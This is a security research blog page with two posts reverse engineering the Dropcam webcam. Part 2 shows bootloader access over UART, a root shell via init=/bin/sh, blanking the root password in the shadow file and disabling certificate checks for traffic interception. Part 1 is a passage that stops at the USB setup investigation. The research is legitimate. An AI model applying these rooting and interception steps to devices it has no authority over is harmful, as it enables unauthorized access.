Thursday, April 3, 2014

Reversing the Dropcam Part 2: Rooting your Dropcam

by Kris Brosch

In the last Dropcam post, I wrote about reversing the USB setup procedure that the Dropcam uses to initially connect to your WiFi network. After exploring the USB tunneling protocol, the next step was to take it apart, or at least take off the back of the enclosure:


The main controller is an Ambarella A5s system-on-chip, which contains an ARM processor, video processing hardware, USB device controller, and other peripherals. We had actually already guessed that the Dropcam used an Ambarella chip based on the iManufacturer USB descriptor field value “Linux 2.6.38.8 with ambarella_udc”. Ambarella chips are also used in GoPro cameras. Quite a bit of work has been done reversing GoPro cameras by other researchers. One researcher, who goes by evilwombat, has done some particularly interesting work, including writing a firmware parser and tools that can be used to load custom code onto GoPro cameras over the USB port, which can be found at his GitHub page (https://github.com/evilwombat?tab=repositories).

Here's a picture of the Dropcam with some of the components identified:


The most useful thing to identify was the UART (serial) port (enlarged in the picture above and labeled with TX, RX, 3.3v, and GND). When I examined the board, that 4-pin footprint looked suspiciously like a serial port. One pad was connected to ground, and another was connected to a thick trace, meaning it was likely a power connection; it does in fact sit at 3.3v when the camera is powered on. The other two pads were connected to resistors via small traces, and both were at 3.3v with the camera powered on. This is consistent with an embedded system serial port: UART lines usually sit at a “high” voltage level when idle; the TX line would be high because no data was being transmitted, and the RX line would be pulled high when no input is connected. I tried connecting the RX line of a serial adapter to each of the two pads in turn and found that when I configured the adapter for a baud rate of 115200 and powered the Dropcam, I could see Linux boot messages being transmitted:
[    0.000000] Linux version 2.6.38.8 (dropcambuild@ubuntu-dropcam-build) (gcc version 4.5.2 (Sourcery G++ Lite 2011.03-41) ) #15 PREEMPT Mon Oct 1 16:59:51 PDT 2012
[    0.000000] CPU: ARMv6-compatible processor [4117b365] revision 5 (ARMv6TEJ), cr=00c5387f
[    0.000000] CPU: VIPT nonaliasing data cache, VIPT nonaliasing instruction cache
[    0.000000] Machine: Coconut
[    0.000000] Memory policy: ECC disabled, Data cache writeback
[    0.000000] Ambarella: AHB   = 0x60000000[0xf0000000],0x01000000 0
[    0.000000] Ambarella: APB   = 0x70000000[0xf1000000],0x01000000 0
[    0.000000] Ambarella: PPM   = 0xc0000000[0xe0000000],0x00200000 9
[    0.000000] Ambarella: BSB   = 0xc8c00000[0xe8c00000],0x00400000 9
[    0.000000] Ambarella: DSP   = 0xc9000000[0xe9000000],0x07000000 9
[    0.000000] Ambarella: HAL   = 0xc00a0000[0xfee00000],0x00009f34 9
[    0.000000] bootmem_init: high_memory = 0xc8a00000
[    0.000000] Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 35052
[    0.000000] Kernel command line: console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc
[    0.000000] PID hash table entries: 1024 (order: 0, 4096 bytes)
[    0.000000] Dentry cache hash table entries: 32768 (order: 5, 131072 bytes)
[    0.000000] Inode-cache hash table entries: 16384 (order: 4, 65536 bytes)
[    0.000000] Memory: 138MB = 138MB total
[    0.000000] Memory: 136244k/136244k available, 5068k reserved, 0K highmem
(etc.)

Once I had identified the TX and RX pads and successfully received some data, I soldered some wires to those pads and brought them out of the case so that I could access the serial port with the Dropcam assembled:
After the boot messages, there is eventually a login prompt:
########  ########   #######  ########   ######     ###    ##     ##
##     ## ##     ## ##     ## ##     ## ##    ##   ## ##   ###   ###
##     ## ##     ## ##     ## ##     ## ##        ##   ##  #### ####
##     ## ########  ##     ## ########  ##       ##     ## ## ### ##
##     ## ##   ##   ##     ## ##        ##       ######### ##     ##
##     ## ##    ##  ##     ## ##        ##    ## ##     ## ##     ##
########  ##     ##  #######  ##         ######  ##     ## ##     ##

Ambarella login:

Getting root via the Ambarella bootloader 

Unfortunately, I didn't know the root password. I tried logging in as root with a few guessed passwords, but none of them worked. I was considering different ways to dump or modify the Flash chip contents when I happened upon a solution on a forum. After reading some posts on one of the GoPro forums, I tried a trick mentioned there to get a bootloader prompt: transmitting a newline immediately upon powering the device on is the key. If you hold down the “Enter” key, repeatedly sending newlines to the serial connection while powering on the Dropcam, you get access to the Ambarella bootloader:
             ___  ___  _________                _
            / _ \ |  \/  || ___ \              | |
           / /_\ \| .  . || |_/ /  ___    ___  | |_
           |  _  || |\/| || ___ \ / _ \  / _ \ | __|
           | | | || |  | || |_/ /| (_) || (_) || |_
           \_| |_/\_|  |_/\____/  \___/  \___/  \__|
----------------------------------------------------------
Amboot(R) Ambarella(R) Copyright (C) 2004-2007
BST (137166), HAL (137166)
Arm freq: 480000000
iDSP freq: 120000000
Core freq: 120000000
Dram freq: 336000000
AHB freq: 120000000
APB freq: 60000000
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot>
amboot> help
The following commands are supported:
help    bios    boot    diag
dump    erase   nand_erase      exec
hal     hotboot netboot ping
r8      r16     r32     reboot
reset   setenv  setmem  show
usbdl   w8      w16     w32
xmdl    bapi
Use 'help' to get help on a specific command
amboot>
Once you have access to the bootloader, rooting the Dropcam is just like getting root on any Linux computer where you have access to the bootloader. You can copy the kernel command line shown in the boot messages:
console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/linuxrc
And change the init parameter to start a shell:
amboot> boot console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw rootfstype=ubifs init=/bin/sh
After doing this and watching the kernel boot again, I was left with a root shell:
[    3.130000] UBIFS: reserved for root:  0 bytes (0 KiB)
[    3.130000] VFS: Mounted root (ubifs filesystem) on device 0:13.
[    3.140000] Freeing init memory: 136K
/bin/sh: can't access tty; job control turned off
/ #
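The command-line edit above is mechanical enough to script. Here is a minimal Python sketch that swaps the init= parameter in a kernel command line; the helper name override_init is made up for illustration and is not part of any Dropcam or Amboot tooling:

```python
def override_init(cmdline, new_init="/bin/sh"):
    """Return cmdline with its init= parameter replaced (appended if absent)."""
    # Drop any existing init= parameter, keep everything else in order.
    params = [p for p in cmdline.split() if not p.startswith("init=")]
    params.append("init=" + new_init)
    return " ".join(params)


# Kernel command line copied from the boot messages.
stock = ("console=ttyS0 ubi.mtd=lnx root=ubi0:rootfs rw "
         "rootfstype=ubifs init=/linuxrc")

# Line to type at the amboot> prompt.
print("boot " + override_init(stock))
```

The printed line is what you would paste at the amboot> prompt. The same helper works for any other replacement init, as long as the binary exists on the root filesystem.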
My goal was to edit the /etc/shadow file so that I could log in to the camera after a normal boot. Interestingly, the /etc/shadow file on the Dropcam is a link to /mnt/dropcam/shadow:
/ # ls -l /etc/shadow
lrwxrwxrwx    1 root     root           21 Oct  1  2012 /etc/shadow -> ../mnt/dropcam/shadow
You therefore need to mount the /mnt/dropcam filesystem to access the shadow file:
/ # cat /etc/fstab
# /etc/fstab: static file system information.
#
# <file system> <mount pt>     <type>   <options>         <dump> <pass>
#/dev/root       /              ext2    rw,noauto         0      1
#proc           /proc          proc     defaults          0      0
devpts          /dev/pts       devpts   defaults,gid=5,mode=620   0      0
#tmpfs           /tmp           tmpfs    defaults          0      0
sysfs           /sys           sysfs    defaults          0      0
debugfs         /debug         debugfs    defaults        0      0

# extra mounts
/dev/mtdblock9 /mnt/dropcam jffs2 defaults 0 0
/ # mount -tjffs2 /dev/mtdblock9 /mnt/dropcam
And then remove the password hashes from it:
/ # cat /mnt/dropcam/shadow
root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
default::10933:0:99999:7:::
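To double-check an edited shadow file, a short Python sketch can list the accounts whose password field is empty. It assumes the standard colon-separated shadow layout, where the second field holds the hash; the function name passwordless_accounts is hypothetical:

```python
def passwordless_accounts(shadow_text):
    """Return the account names whose password field (field 2) is empty."""
    names = []
    for line in shadow_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        # An empty second field means no password is required;
        # "*" or "!" would instead mean password login is disabled.
        if len(fields) >= 2 and fields[1] == "":
            names.append(fields[0])
    return names


# A few entries from the edited shadow file shown above.
sample = """root::10933:0:99999:7:::
bin:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
default::10933:0:99999:7:::"""

print(passwordless_accounts(sample))  # ['root', 'default']
```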
The /mnt/dropcam filesystem is interesting because it appears to be where camera-specific configuration files are stored:
/ # ls /mnt/dropcam/
bpcmap.bin           keycert.pem          softmac
fv.txt               provisioned          wpa_supplicant.conf
hwver                shadow
This implies that different cameras might have different root passwords. The wpa_supplicant.conf file contains the configuration for the wireless network. Most interesting of these files, however, is the keycert.pem file, which contains a public/private RSA key pair and a client certificate. The certificate is issued by a “Dropcam Certificate Authority”, and the common name is set to the unique ID of my Dropcam (the same identifier used to set up the camera and view its stream, as discussed in my previous post):
$ openssl x509 -in keycert.pem -noout -text | grep CN
        Issuer: C=US, CN=Dropcam Certificate Authority, O=Dropcam
        Subject: C=US, CN=d024378182da4f37b0e981946989f40a, O=Dropcam
This means that each Dropcam has a unique client certificate that it uses to authenticate to the Dropcam cloud servers.

Exploring the running device

Now that I had modified the shadow file, I was able to log in as root without a password and inspect the system after it had booted normally:
# ps
PID   USER     TIME   COMMAND
    1 root       0:02 init
    2 root       0:00 [kthreadd]
    3 root       0:00 [ksoftirqd/0]
    4 root       0:00 [kworker/0:0]
    5 root       0:00 [kworker/u:0]
    6 root       0:00 [khelper]
    7 root       0:00 [kworker/u:1]
  402 root       0:00 [sync_supers]
  404 root       0:00 [bdi-default]
  406 root       0:00 [kblockd]
  513 root       0:00 [kswapd0]
  514 root       0:00 [fsnotify_mark]
  515 root       0:00 [aio]
  517 root       0:00 [crypto]
  558 root       0:00 [mtdblock0]
  563 root       0:00 [mtdblock1]
  568 root       0:00 [mtdblock2]
  573 root       0:00 [mtdblock3]
  578 root       0:00 [mtdblock4]
  583 root       0:00 [mtdblock5]
  588 root       0:00 [mtdblock6]
  593 root       0:00 [mtdblock7]
  598 root       0:00 [mtdblock8]
  603 root       0:00 [mtdblock9]
  611 root       0:00 [ubi_bgt0d]
  628 root       0:00 [ubifs_bgt0_0]
  629 root       0:00 [kworker/0:1]
  643 root       0:00 [flush-ubifs_0_0]
  646 root       0:00 [jffs2_gcd_mtd9]
  699 root       0:00 [kworker/u:2]
  735 root       0:00 /bin/ash /usr/bin/bootstrap.sh
  736 root       0:00 -sh
  738 root       0:00 syslogd -C128 -S
  740 root       0:00 klogd
  743 root       0:00 /usr/bin/connect
  744 root       0:00 logger -t connect
  745 root       0:00 /usr/bin/connect
  746 root       0:00 /usr/bin/connect
  760 root       0:00 [file-storage]
  772 root       0:00 [kworker/0:2]
  784 root       0:00 [cfg80211]
  804 root       0:00 [AR6K Async]
  811 root       0:00 [ksdioirqd/mmc1]
  822 root       0:00 wpa_supplicant -iwlan0 -c/mnt/dropcam/wpa_supplicant.conf
  829 root       0:00 [dsplogd]
  830 root       0:00 [vsyncd]
  860 root       0:00 [sh]
  861 root       0:00 [sh]
  868 root       0:00 ps
The /usr/bin/connect binary performs most of the operations of the Dropcam. It handles the TLS connections made out to Dropcam cloud servers (which, based on strings in the connect binary, carry a protocol named droptalk). It also handles loading and unloading the kernel driver, as well as the userspace portions of the USB mass storage network tunnel (which again, based on strings in the binary, is named FSNL). The connect binary is UPX packed, but it can be unpacked easily:
$ strings connect | tail -1
UPX!
$ upx -d connect
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.09        Markus Oberhumer, Laszlo Molnar & John Reiser   Feb 18th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    789596 <-    420052   53.20%   linux/armel   connect

Unpacked 1 file.
One thing that we noticed when looking at this binary was that it contains references to the Lua scripting language. We weren't sure why until we saw that it was writing to a file named /tmp/connect.bin and then running this command via a call to system():
rm -rf /tmp/connect && mkdir /tmp/connect && tar zx -f /tmp/connect.bin -C /tmp/connect && rm /tmp/connect.bin
The connect binary itself contains an embedded tarball that gets extracted to /tmp/connect when it runs. The tarball contains an assortment of files including a number of compiled Lua scripts:
$ dd if=./connect of=connect.tar.gz bs=1 skip=473404 count=168451
168451+0 records in
168451+0 records out
168451 bytes (168 kB) copied, 0.364475 s, 462 kB/s
$ tar -tzvf connect.tar.gz
-rw-r--r-- dropcambuild/dropcambuild 10376 2013-04-22 20:25 dispatch.bin
-rw-r--r-- dropcambuild/dropcambuild  1243 2013-04-22 20:25 hello.bin
-rw-r--r-- dropcambuild/dropcambuild   545 2013-04-22 20:25 hwver.bin
-rw-r--r-- dropcambuild/dropcambuild  4279 2013-04-22 20:25 ir.bin
-rw-r--r-- dropcambuild/dropcambuild   879 2013-04-22 20:25 list.bin
-rw-r--r-- dropcambuild/dropcambuild   650 2013-04-22 20:25 main.bin
-rw-r--r-- dropcambuild/dropcambuild  2363 2013-04-22 20:25 monitor.bin
-rw-r--r-- dropcambuild/dropcambuild   708 2013-04-22 20:25 motion.bin
-rw-r--r-- dropcambuild/dropcambuild  2010 2013-04-22 20:25 net.bin
-rw-r--r-- dropcambuild/dropcambuild  2607 2013-04-22 20:25 oldiags.bin
-rw-r--r-- dropcambuild/dropcambuild  3280 2013-04-22 20:25 persistence.bin
-rw-r--r-- dropcambuild/dropcambuild   329 2013-04-22 20:25 platform.bin
-rw-r--r-- dropcambuild/dropcambuild  3365 2013-04-22 20:25 platform_a5s.bin
-rw-r--r-- dropcambuild/dropcambuild   551 2013-04-22 20:25 platform_local.bin
-rw-r--r-- dropcambuild/dropcambuild   822 2013-04-22 20:25 ravg.bin
-rw-r--r-- dropcambuild/dropcambuild   191 2013-04-22 20:25 rtp.bin
-rw-r--r-- dropcambuild/dropcambuild   643 2013-04-22 20:25 settings.bin
-rw-r--r-- dropcambuild/dropcambuild  9931 2013-04-22 20:25 states.bin
-rw-r--r-- dropcambuild/dropcambuild   912 2013-04-22 20:25 status.bin
-rw-r--r-- dropcambuild/dropcambuild  3822 2013-04-22 20:25 streams.bin
-rw-r--r-- dropcambuild/dropcambuild  3047 2013-04-22 20:25 update.bin
-rw-r--r-- dropcambuild/dropcambuild   601 2013-04-22 20:25 usb.bin
-rw-r--r-- dropcambuild/dropcambuild  2602 2013-04-22 20:25 util.bin
-rw-r--r-- dropcambuild/dropcambuild  1468 2013-04-22 20:25 watchdog.bin
-rw-r--r-- dropcambuild/dropcambuild 54727 2013-04-22 20:25 droptalk_pb.bin
-rw-r--r-- dropcambuild/dropcambuild  1504 2013-04-22 20:25 containers.bin
-rw-r--r-- dropcambuild/dropcambuild  5879 2013-04-22 20:25 decoder.bin
-rw-r--r-- dropcambuild/dropcambuild  1038 2013-04-22 20:25 descriptor.bin
-rw-r--r-- dropcambuild/dropcambuild  9360 2013-04-22 20:25 encoder.bin
-rw-r--r-- dropcambuild/dropcambuild   615 2013-04-22 20:25 listener.bin
-rw-r--r-- dropcambuild/dropcambuild 20750 2013-04-22 20:25 protobuf.bin
-rw-r--r-- dropcambuild/dropcambuild  1505 2013-04-22 20:25 text_format.bin
-rw-r--r-- dropcambuild/dropcambuild  1525 2013-04-22 20:25 type_checkers.bin
-rw-r--r-- dropcambuild/dropcambuild  3620 2013-04-22 20:25 wire_format.bin
-rw-r--r-- dropcambuild/dropcambuild  1686 2013-04-22 17:24 a5s_boot.sh
-rw-r--r-- dropcambuild/dropcambuild    78 2013-04-18 16:45 wpa_supplicant_a5s.conf
-rwxr-xr-x dropcambuild/dropcambuild  1286 2013-04-18 16:45 udhcpc.script
-rwxr-xr-x dropcambuild/dropcambuild  1310 2013-04-18 16:45 udhcpc_provision.script
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_01_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_01_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_02_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_02_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_03_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_03_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_04_3D_hwrev_1.bin
-rw-r--r-- dropcambuild/dropcambuild 17536 2013-04-18 16:45 ov9715_04_3D_hwrev_2.bin
-rw-r--r-- dropcambuild/dropcambuild 27453 2013-04-18 16:45 ambarella_udc-pre-v16.ko
-rwxr-xr-x dropcambuild/dropcambuild 86828 2013-04-18 16:45 wmiconfig
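The dd and tar steps above can also be done in a few lines of Python. This is only a sketch: carve and list_members are illustrative names, and the demo builds a small stand-in blob in memory so it runs without a copy of the connect binary.

```python
import io
import tarfile


def carve(blob, offset, length):
    """Return `length` bytes of `blob` starting at `offset` (like dd skip/count)."""
    chunk = blob[offset:offset + length]
    if len(chunk) != length:
        raise ValueError("requested range runs past the end of the data")
    return chunk


def list_members(targz):
    """List the member names of a gzip-compressed tarball held in memory."""
    with tarfile.open(fileobj=io.BytesIO(targz), mode="r:gz") as tar:
        return tar.getnames()


def make_demo_blob():
    """Build a fake 'binary' with a small tar.gz embedded after 16 padding bytes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = b"stand-in for a compiled Lua script"
        info = tarfile.TarInfo("main.bin")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    archive = buf.getvalue()
    return b"\x00" * 16 + archive + b"\xff" * 8, 16, len(archive)


blob, offset, length = make_demo_blob()
print(list_members(carve(blob, offset, length)))  # ['main.bin']
```

Against the real unpacked binary, you would read the file into memory and call carve(data, 473404, 168451), using the offset and size from the dd command above. Those numbers apply only to this particular build of connect.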
We'll have another blog post coming up detailing how to reverse engineer those compiled Lua scripts, with a tool to make the RE work easier.

Transport encryption and exploring traffic interception


I wanted to perform a man-in-the-middle attack so that I could decode the TLS traffic from the camera. Every Dropcam has its own client certificate issued by the Dropcam CA; with a copy of my camera's client certificate I could start a TLS connection to the Dropcam servers, but I couldn't yet convince the connect binary to connect to me. In order to perform the man-in-the-middle attack, the simplest option was to patch the server certificate checking code out of the connect binary. This involved flipping one bit in the unpacked binary, re-packing it, and uploading it to the camera.

The droptalk transport layer has decent protection against eavesdropping attacks. It uses an OpenSSL TLSv1 connection with ephemeral elliptic curve Diffie-Hellman (ECDHE) key exchange, and either 128 or 256 bit AES encryption. This is the list of the two cipher suites that the connect binary will accept for the droptalk connection:
ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA
The ECDHE key exchange method made performing a man-in-the-middle attack on the droptalk connection harder because most tools that I tried to use didn't support that key exchange algorithm. However, I was able to hack together some code that, given the camera's private key and certificate, would let me intercept and examine the droptalk traffic between my patched connect binary and the Dropcam servers. Here's a picture of my test setup:
My Linux machine was configured to act as a wireless access point, using iptables to redirect the Dropcam traffic to my listening droptalk interception process. In addition, I had a serial terminal connected to the Dropcam's serial port so I could upload the patched connect binary and examine its behavior. The droptalk protocol is simple: there is a 3-byte header consisting of a one-byte message type followed by a big-endian two-byte length field. Luckily, there is a function in the connect binary for converting droptalk message type identifiers (the first byte in the header) to human-readable strings for inclusion in debug output:
The function provides us with this list of droptalk message types:
00      RESERVED
01      REDIRECT
02      START_STREAM
03      STOP_STREAM
04      WIFI_SCAN
05      WIFI_CONNECT
06      RESTART
07      UPDATE
08      DEBUG
09      SET_STATUS_LIGHT
0a      SET_ILLUMINATOR_LIGHT
0b      SET_AUDIO_GAIN
0c      STOP_BACKFILL
0d      AUDIO_PAYLOAD
0e      SET_IR_LED
0f      SET_DPTZ
10      FORCE_IDR
11      EXEC
12      SET_WATERMARK
13      AUDIO_SOUND
14      SET_IMAGE_PROPERTIES
40      PING
80      HELLO
81      STREAM_BEGIN
82      STREAM_END
83      RTP
84      WIFI_SCAN_LIST
85      WIFI_CONNECT_STATUS
86      EVENT
87      BACKFILL_COMPLETE
8a      UPDATE_RESULT
8c      OFFLINE_DIAGNOSTIC_REPORT
8e      STATUS_REPORT
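The framing and the type table above can be sketched in Python as follows. One assumption is labeled in the code: the post does not say whether the two-byte length covers only the payload or the header as well, so this sketch treats it as the payload length. The function names are illustrative.

```python
import struct

# Message type names recovered from the connect binary (table above).
MESSAGE_TYPES = {
    0x00: "RESERVED", 0x01: "REDIRECT", 0x02: "START_STREAM",
    0x03: "STOP_STREAM", 0x04: "WIFI_SCAN", 0x05: "WIFI_CONNECT",
    0x06: "RESTART", 0x07: "UPDATE", 0x08: "DEBUG",
    0x09: "SET_STATUS_LIGHT", 0x0A: "SET_ILLUMINATOR_LIGHT",
    0x0B: "SET_AUDIO_GAIN", 0x0C: "STOP_BACKFILL", 0x0D: "AUDIO_PAYLOAD",
    0x0E: "SET_IR_LED", 0x0F: "SET_DPTZ", 0x10: "FORCE_IDR", 0x11: "EXEC",
    0x12: "SET_WATERMARK", 0x13: "AUDIO_SOUND", 0x14: "SET_IMAGE_PROPERTIES",
    0x40: "PING", 0x80: "HELLO", 0x81: "STREAM_BEGIN", 0x82: "STREAM_END",
    0x83: "RTP", 0x84: "WIFI_SCAN_LIST", 0x85: "WIFI_CONNECT_STATUS",
    0x86: "EVENT", 0x87: "BACKFILL_COMPLETE", 0x8A: "UPDATE_RESULT",
    0x8C: "OFFLINE_DIAGNOSTIC_REPORT", 0x8E: "STATUS_REPORT",
}


def parse_header(data):
    """Split the 3-byte header into (type name, length)."""
    if len(data) < 3:
        raise ValueError("need at least 3 bytes for a droptalk header")
    # One-byte type followed by a big-endian two-byte length.
    msg_type, length = struct.unpack(">BH", data[:3])
    name = MESSAGE_TYPES.get(msg_type, "UNKNOWN_%02x" % msg_type)
    return name, length


def split_messages(stream):
    """Yield (type name, payload) for each complete message in `stream`.

    ASSUMPTION: the length field counts payload bytes only.
    """
    pos = 0
    while pos + 3 <= len(stream):
        name, length = parse_header(stream[pos:pos + 3])
        payload = stream[pos + 3:pos + 3 + length]
        if len(payload) < length:
            break  # incomplete message; wait for more data
        yield name, payload
        pos += 3 + length


# Hand-built example bytes, not captured traffic.
demo = b"\x40\x00\x00" + b"\x01\x00\x03abc"
print(list(split_messages(demo)))  # [('PING', b''), ('REDIRECT', b'abc')]
```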
Message types 0x01 through 0x14 appear to be messages that are sent to the camera, while types 0x80 through 0x8e appear to be intended to originate from the camera. Most of the droptalk messages contain protobufs which are decoded in the Lua code. For example, here's the first HELLO packet that my Dropcam sends when it connects to nexus.dropcam.com, decoded with the protoc tool:
7: "Dropcam Connect - Version: 162, Build: 57 (jenkins-connect-release-node=linux-57, a29560dbb0724e7dbafb19b9ac1268b6fb62f1d6, origin/hotfix/basil)"
9: 2
8: "Build: 181 (jenkins-ambarella-181, 8732f64a79aecdd16bf6562775015c303d71c839), Linux: Linux Ambarella 2.6.38.8 #15 PREEMPT Mon Oct 1 16:59:51 PDT 2012 armv6l GNU/Linux"
1: 1
5: 3
6: 15
4: "0.0.0.0"
2: 4
3: 162
The nexus.dropcam.com server always replies with a REDIRECT to an “oculus” server:
1: "oculus121.dropcam.com"
The client then connects to the “oculus” server and sends another HELLO packet. Most of the configuration options in the Dropcam web interface correspond to droptalk messages that are sent to the camera. When the server is ready to receive data, it sends a START_STREAM message with some video parameters in it. Video data is sent from the camera in RTP droptalk messages containing RTP formatted video data.
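The numbered fields in the decoded HELLO and REDIRECT messages are what a schema-less protobuf decode looks like (protoc offers this as --decode_raw). As a rough sketch of how that works, the Python below walks the protobuf wire format for the two wire types that appear in those dumps, varints and length-delimited fields. The sample bytes are hand-encoded for illustration and are not captured droptalk traffic.

```python
def read_varint(buf, pos):
    """Decode a base-128 varint starting at pos; return (value, next position)."""
    result = 0
    shift = 0
    while True:
        if pos >= len(buf):
            raise ValueError("truncated varint")
        byte = buf[pos]
        pos += 1
        result |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return result, pos
        shift += 7


def decode_raw(buf):
    """Return a list of (field number, value) pairs without needing a .proto file."""
    fields = []
    pos = 0
    while pos < len(buf):
        key, pos = read_varint(buf, pos)
        field_no, wire_type = key >> 3, key & 0x07
        if wire_type == 0:  # varint
            value, pos = read_varint(buf, pos)
        elif wire_type == 2:  # length-delimited (strings, bytes, sub-messages)
            size, pos = read_varint(buf, pos)
            value = buf[pos:pos + size]
            if len(value) != size:
                raise ValueError("truncated length-delimited field")
            pos += size
        else:
            raise ValueError("wire type %d not handled in this sketch" % wire_type)
        fields.append((field_no, value))
    return fields


# Hand-encoded REDIRECT-style message: field 1 holds a host name.
host = b"oculus121.dropcam.com"
redirect = b"\x0a" + bytes([len(host)]) + host
print(decode_raw(redirect))  # [(1, b'oculus121.dropcam.com')]

# Hand-encoded fragment with fields 1, 3 and 4, as seen in the HELLO dump.
fragment = b"\x08\x01" + b"\x18\xa2\x01" + b"\x22\x07" + b"0.0.0.0"
print(decode_raw(fragment))  # [(1, 1), (3, 162), (4, b'0.0.0.0')]
```

A decoder like this only recovers field numbers and raw values. Naming the fields still requires reading the Lua code or writing a .proto definition by hand.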

Conclusions

In this post I've written about the process of reverse engineering the Dropcam from the point of opening the case to having a basic understanding of its network protocols. With the information we've gathered, you could start to piece together a protobuf definition file (.proto file) for the various message types and write your own droptalk client or server. Alternatively, you could use the root shell on the Dropcam to modify or add to its functionality. Comment below, email us, or tweet @IncludeSecurity if you try these things; we'd love to hear what modifications you make to your Dropcam.

Stay tuned for the final blog post in this series regarding Lua scripts!

Thursday, March 27, 2014

Reversing the Dropcam Part 1: Wireless and network communications

by Kris Brosch

The "Internet of Things" marketplace has been blowing up recently, and towards the end of last year we began seeing a lot of demand for security assessments of these types of platforms. To practice, we wanted to reverse engineer a consumer platform from scratch and look around for security vulnerabilities. What follows is the first of a three-part series on what we were able to do with the Dropcam. Through this research, we found the Dropcam has a pretty solid security model, so no 0day in this post. That being said, this type of reversing work is the most important prerequisite for finding security vulnerabilities, so we thought it would be great to share our findings and techniques with the security and reverse engineering communities. Hope you enjoy, and leave a comment if you have any further ideas to extend what we're showing here.

For those that don't know, the Dropcam is a cloud-based webcam. It connects to the internet over WiFi, and users interact with it entirely through the dropcam.com web interface or a mobile app. We purchased some Dropcam cameras to find out more about how they work. In this series, you'll get an idea of how the process of reversing a device like the Dropcam works, including the tools we use and how we use them. This project ultimately ends up going into hardware hacking, but as you'll see below, you can often gather a lot of information about how a device works before you open the case. Everything in this first post was done without taking the Dropcam apart, while our next posts will discuss taking it apart and some hardware hacking basics.

Getting the Dropcam connected to the WiFi

As I was opening the Dropcam box, one of the first questions I asked was: how does it set up its WiFi connection? It's supposed to connect to your WiFi and present a configuration interface through dropcam.com, but it must have to learn at least your WiFi SSID first to do that. The documentation tells you to plug the USB cable into your computer and run through setup.

When you plug your Dropcam's USB cable into your computer, the camera enumerates as a USB mass storage device with a few files on it, including setup binaries for both MacOS and Windows:
$ find .
.
./.dcdata
./.dcdata/volume.ico
./.dcdata/offset
./Setup Dropcam (Macintosh).app
./Setup Dropcam (Macintosh).app/Contents
./Setup Dropcam (Macintosh).app/Contents/Resources
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj
./Setup Dropcam (Macintosh).app/Contents/Resources/English.lproj/InfoPlist.strings
./Setup Dropcam (Macintosh).app/Contents/Resources/OSXSetup.icns
./Setup Dropcam (Macintosh).app/Contents/Info.plist
./Setup Dropcam (Macintosh).app/Contents/PkgInfo
./Setup Dropcam (Macintosh).app/Contents/MacOS
./Setup Dropcam (Macintosh).app/Contents/MacOS/Setup Dropcam (Macintosh)
./Setup Dropcam (Macintosh).app/winicon.ico
./Setup Dropcam (Macintosh).app/desktop.ini
./Setup Dropcam (Windows).exe
./._Setup Dropcam (Windows).exe
./.VolumeIcon.icns
./._.VolumeIcon.icns
./._?
./autorun.inf
./.hidden

Here are a few lines from the output of lsusb on the host computer:
ID 0525:a4a5 Netchip Technology, Inc. Linux-USB File Storage Gadget
...
  idVendor           0x0525 Netchip Technology, Inc.
  idProduct          0xa4a5 Linux-USB File Storage Gadget
...
  iManufacturer           2 Linux 2.6.38.8 with ambarella_udc
  iProduct                3 Dropcam Setup
...

When I ran the setup binary, it opened a web browser to
https://www.dropcam.com/setup/d024378182da4f37b0e981946989f40a?cv=140&fv=15&hv=3&platform=windows
The 32-character string in the URL is the unique identifier of my Dropcam. As you go through the web interface to set up the Dropcam, your browser eventually gets sent a JSON blob from a Dropcam web server containing a list of network SSIDs, BSSIDs, and other details of wireless networks near the camera. This data is presented in a list so that the user can pick which access point they want their camera to connect to.
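If you want to pull the identifier and query parameters out of a setup URL programmatically, a minimal Python sketch using only the standard library could look like this. The function name is illustrative, and the meaning of the cv, fv, and hv parameters is not established here, so the sketch just returns them as strings.

```python
from urllib.parse import parse_qs, urlsplit


def parse_setup_url(url):
    """Return (camera id, dict of query parameters) from a setup URL."""
    parts = urlsplit(url)
    # The identifier is the last path component.
    camera_id = parts.path.rstrip("/").rsplit("/", 1)[-1]
    params = {key: values[0] for key, values in parse_qs(parts.query).items()}
    return camera_id, params


url = ("https://www.dropcam.com/setup/d024378182da4f37b0e981946989f40a"
       "?cv=140&fv=15&hv=3&platform=windows")
camera_id, params = parse_setup_url(url)
print(camera_id, len(camera_id))
print(params)
```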

How does the server get the list of WiFi networks? It must be communicating with the Dropcam, but at first it's not clear how. When the device is plugged in to a USB port, the Dropcam appears only as a mass storage device, so somehow a mass storage device is talking to the Internet through my computer.

To investigate further, I set up the testing environment depicted here:



